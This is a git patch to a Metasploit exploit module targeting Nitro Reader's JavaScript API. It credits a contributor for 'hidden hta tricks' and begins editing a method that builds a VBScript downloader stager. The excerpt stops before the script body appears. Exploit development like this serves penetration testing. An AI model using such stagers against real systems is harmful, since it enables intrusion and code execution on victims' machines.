From 14ca2ed3259e3c097cce3432bcb593a9da2ad371 Mon Sep 17 00:00:00 2001 From: mr_me Date: Mon, 24 Jul 2017 10:06:20 -0700 Subject: [PATCH] Added a icon loading trick by Brendan --- .../windows/fileformat/nitro_reader_jsapi.rb | 23 ++++++++++++++++--- 1 file changed, 20 insertions(+), 3 deletions(-) diff --git a/modules/exploits/windows/fileformat/nitro_reader_jsapi.rb b/modules/exploits/windows/fileformat/nitro_reader_jsapi.rb index 302e61a6da..470a2625dc 100644 --- a/modules/exploits/windows/fileformat/nitro_reader_jsapi.rb +++ b/modules/exploits/windows/fileformat/nitro_reader_jsapi.rb @@ -25,8 +25,9 @@ class MetasploitModule < Msf::Exploit::Remote 'License' => MSF_LICENSE, 'Author' => [ - 'mr_me ', # vulnerability discovery and exploit - 'sinn3r' # help with msf foo! + 'mr_me ', # vulnerability discovery and exploit + 'Brendan Coles ', # hidden hta tricks! + 'sinn3r' # help with msf foo! ], 'References' => [ @@ -55,7 +56,23 @@ class MetasploitModule < Msf::Exploit::Remote def build_vbs(url, stager_name) name_xmlhttp = rand_text_alpha(2) name_adodb = rand_text_alpha(2) - vbs = %Q| + vbs = %Q| +